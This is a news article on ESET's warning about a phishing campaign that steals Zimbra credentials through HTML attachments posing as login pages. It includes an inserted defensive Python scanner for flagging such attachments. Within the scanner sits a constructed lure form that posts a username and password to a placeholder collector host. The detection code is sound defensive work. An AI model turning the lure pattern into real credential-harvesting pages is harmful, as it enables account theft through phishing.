UPDATED 20:06 EST / AUGUST 17 2023

SECURITY

Researchers warn of new mass-spreading phishing campaign targeting Zimbra users

Security researchers at ESET s.r.o. today warned of a new mass-spreading phishing campaign actively targeting Zimbra account user credentials.

First detected in April, the ongoing campaign is targeting a variety of small and medium businesses and governmental entities. The largest number of targets recorded so far have been among users in Poland, but other European and Latin American countries have also been targeted, including Ukraine, Italy, France and Ecuador.

Although the researchers note that the campaign itself is not particularly technically sophisticated, it can still spread and compromise organizations that use Zimbra Collaboration, a software suite that includes an email server and web client.

The group behind the campaign sends emails to potential victims, including a phishing page in an attached HTML file. The emails warn the potential victim about an email server update, account deactivation or similar issue and direct the user to click on the attached file.

After opening the attachment, the user is taken to a fake Zimbra login page customized for the targeted organization. The fake login page harvests the credentials a victim enters and sends them to a server controlled by the attackers.

“Adversaries leverage the fact that HTML attachments contain legitimate code, with the only telltale element being a link pointing to the malicious host,” explained ESET researcher Viktor Šperka, who discovered the campaign. “In this manner, it is much easier to circumvent reputation-based anti-spam policies, especially compared with more prevalent phishing techniques, where a malicious link is directly placed in the email body.”
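The telltale Šperka describes, an otherwise ordinary HTML attachment whose only suspicious element is a reference to a host outside the organization, is something a mail gateway or analyst script can check for directly. The following is an added example, not code from ESET or Zimbra: it parses an HTML attachment with Python's standard library, collects every attribute that would make a browser contact a host, and flags a form containing a password field whose action posts to a host that is not on an allowlist. The allowlist (`mail.example.com`), the lure HTML and the `.invalid` hostname are constructed for the example.

```python
"""Flag HTML e-mail attachments that would send credentials to an external host.

Added example (not part of the original article). Assumes the organization's
own webmail hosts are known and listed in TRUSTED_HOSTS (constructed values).
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: hosts the organization's real Zimbra web client uses.
TRUSTED_HOSTS = {"mail.example.com", "example.com"}

# Attributes that cause the browser to contact a host when the page is rendered
# or a form is submitted.
URL_ATTRS = ("action", "formaction", "href", "src")


class _AttachmentScanner(HTMLParser):
    """Collect outbound references and the target of any password-bearing form."""

    def __init__(self):
        super().__init__()
        self.refs = []      # (tag, attribute, raw value)
        self.forms = []     # {"action": str, "password": bool}
        self._form = None   # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        for name in URL_ATTRS:
            value = a.get(name)
            if value:
                self.refs.append((tag, name, value))
        if tag == "form":
            self._form = {"action": a.get("action") or "", "password": False}
        elif tag == "input" and self._form is not None:
            # A password field inside a form marks it as a credential form.
            if (a.get("type") or "").lower() == "password":
                self._form["password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None


def _host(url):
    """Hostname of an absolute URL, lower-cased; None for relative/hostless URLs."""
    host = urlparse(url).hostname
    return host.lower() if host else None


def scan_attachment(html, trusted=TRUSTED_HOSTS):
    """Return a verdict dict for one HTML attachment body."""
    p = _AttachmentScanner()
    p.feed(html)
    p.close()

    external_refs = sorted({
        (tag, attr, _host(value))
        for tag, attr, value in p.refs
        if _host(value) and _host(value) not in trusted
    })
    # Forms that carry a password field and post somewhere outside the organization.
    exfil_hosts = sorted({
        _host(f["action"]) for f in p.forms
        if f["password"] and _host(f["action"]) and _host(f["action"]) not in trusted
    })
    return {
        "external_refs": external_refs,
        "credential_exfil_hosts": exfil_hosts,
        "suspicious": bool(exfil_hosts),
    }


# Constructed lure: a minimal login form posting to an attacker-style host.
# The ".invalid" TLD is a reserved placeholder, not a real destination.
SAMPLE_LURE = """<html><body>
<img src="https://mail.example.com/img/logo.png">
<form method="post" action="https://collector.invalid/login.php">
  <input name="username"><input type="password" name="password">
  <input type="submit" value="Sign in">
</form></body></html>"""

# Constructed benign attachment: the form posts back to a relative path.
SAMPLE_BENIGN = """<html><body>
<form method="post" action="/zimbra/">
  <input name="username"><input type="password" name="password">
</form></body></html>"""


if __name__ == "__main__":
    for label, body in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        print(label, scan_attachment(body))
```

Run over the attachments extracted from quarantined mail, the `credential_exfil_hosts` list gives the host to block and to search for in web-proxy logs; `external_refs` is the broader list worth reviewing by hand, since image and stylesheet references to unknown hosts are common in legitimate mail and are reported but not treated as suspicious on their own.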

With those credentials, the attackers then infiltrate the affected account. In the cases where they have compromised an administrator account, they create new mailboxes that are used to send new phishing emails to other targets.

“What’s interesting to me is that previous commenters are saying this isn’t a sophisticated phishing campaign,” Roger Grimes, data-driven defense evangelist at cybersecurity company KnowBe4 Inc., told SiliconANGLE. “The initial phishing email redirects potential victims to a fake login page that contains their company’s logo and name. Both of these items significantly increase the chances that potential victims will be fooled and provide login credentials. I’m not sure this is the most sophisticated phishing campaign ever, but it’s not an unsophisticated one either.”

Grimes added that those using Zimbra must start taking their security seriously. “Step one is enabling phishing-resistant multifactor authentication on all Zimbra users and admins,” Grimes recommended. “If that had been done, these accounts, some of them admin, would not have been taken over by this latest phishing campaign.”
